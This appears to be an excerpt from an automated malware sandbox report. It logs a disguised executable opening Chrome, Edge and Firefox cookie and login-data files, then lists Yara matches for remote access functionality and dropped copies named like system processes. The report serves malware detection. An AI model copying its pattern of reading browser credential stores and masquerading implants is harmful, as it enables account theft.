Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

Remote Access Functionality

Source: Yara match File source: fDTPlvsGfH.exe, type: SAMPLE
Source: Yara match File source: 0.0.fDTPlvsGfH.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1623414051.0000000000062000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fDTPlvsGfH.exe PID: 6168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe PID: 7744, type: MEMORYSTR
Source: Yara match File source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, type: DROPPED
Source: Yara match File source: C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe, type: DROPPED
Source: Yara match File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe, type: DROPPED